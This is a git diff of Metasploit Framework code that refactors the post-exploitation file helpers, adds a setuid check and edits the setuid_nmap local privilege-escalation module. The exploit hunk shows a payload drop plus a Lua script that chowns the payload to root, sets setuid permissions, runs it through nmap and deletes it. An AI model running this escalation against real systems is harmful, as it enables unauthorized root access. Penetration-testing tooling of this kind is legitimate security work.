diff --git a/lib/msf/core/post/file.rb b/lib/msf/core/post/file.rb index 3a76ff1f58..f931379de4 100644 --- a/lib/msf/core/post/file.rb +++ b/lib/msf/core/post/file.rb @@ -59,7 +59,7 @@ module Msf::Post::File # # @param path [String] Remote filename to check def directory?(path) - if session.type == "meterpreter" + if session.type == 'meterpreter' stat = session.fs.file.stat(path) rescue nil return false unless stat return stat.directory? @@ -70,9 +70,9 @@ module Msf::Post::File f = session.shell_command_token("test -d \"#{path}\" && echo true") end - return false if f.nil? or f.empty? + return false if f.nil? || f.empty? return false unless f =~ /true/ - return true + true end end @@ -93,7 +93,7 @@ module Msf::Post::File # # @param path [String] Remote filename to check def file?(path) - if session.type == "meterpreter" + if session.type == 'meterpreter' stat = session.fs.file.stat(path) rescue nil return false unless stat return stat.file? @@ -107,20 +107,40 @@ module Msf::Post::File f = session.shell_command_token("test -f \"#{path}\" && echo true") end - return false if f.nil? or f.empty? + return false if f.nil? || f.empty? return false unless f =~ /true/ - return true + true end end alias file_exist? file? + # + # See if +path+ on the remote system is a setuid file + # + # @param path [String] Remote filename to check + def setuid?(path) + if session.type == 'meterpreter' + stat = session.fs.file.stat(path) rescue nil + return false unless stat + return stat.setuid? + else + if session.platform != 'windows' + f = session.shell_command_token("test -u \"#{path}\" && echo true") + end + + return false if f.nil? || f.empty? + return false unless f =~ /true/ + true + end + end + # # Check for existence of +path+ on the remote file system # # @param path [String] Remote filename to check def exist?(path) - if session.type == "meterpreter" + if session.type == 'meterpreter' stat = session.fs.file.stat(path) rescue nil return !!(stat) else @@ -130,9 +150,9 @@ module Msf::Post::File f = cmd_exec("test -e \"#{path}\" && echo true") end - return false if f.nil? or f.empty? + return false if f.nil? || f.empty? return false unless f =~ /true/ - return true + true end end @@ -290,7 +310,7 @@ module Msf::Post::File end end - return true + true end # @@ -314,7 +334,7 @@ module Msf::Post::File _write_file_unix_shell(file_name, data, true) end end - return true + true end # diff --git a/modules/exploits/unix/local/setuid_nmap.rb b/modules/exploits/unix/local/setuid_nmap.rb index f10df3a014..020e196bec 100644 --- a/modules/exploits/unix/local/setuid_nmap.rb +++ b/modules/exploits/unix/local/setuid_nmap.rb @@ -51,12 +51,11 @@ class MetasploitModule < Msf::Exploit::Local end def check - stat = session.fs.file.stat(datastore["Nmap"]) - if stat and stat.file? and stat.setuid? - vprint_good("#{stat.prettymode} #{datastore["Nmap"]}") + if setuid?(datastore['Nmap']) + vprint_good("#{datastore['Nmap']} is setuid") return CheckCode::Vulnerable end - return CheckCode::Safe + CheckCode::Safe end def exploit @@ -69,16 +68,16 @@ class MetasploitModule < Msf::Exploit::Local write_file(exe_file, generate_payload_exe) evil_lua = %Q{ os.execute("chown root:root #{exe_file}"); - os.execute("chmod 6777 #{exe_file}"); + os.execute("chmod 6700 #{exe_file}"); os.execute("#{exe_file} &"); - os.execute("rm #{exe_file}"); + os.execute("rm -f #{exe_file}"); } end lua_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}.nse" print_status("Dropping lua #{lua_file}") write_file(lua_file, evil_lua) - print_status("running") + print_status("Running #{lua_file} with Nmap") scriptname = lua_file if (lua_file[0,1] == "/") @@ -91,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Local # Versions before 4.75 (August 2008) will not run scripts without a port scan cmd_exec "#{datastore["Nmap"]} --script #{scriptname} -p80 localhost #{datastore["ExtraArgs"]}" ensure - cmd_exec "rm -f #{lua_file} #{exe_file}" + rm_f(lua_file, exe_file) end end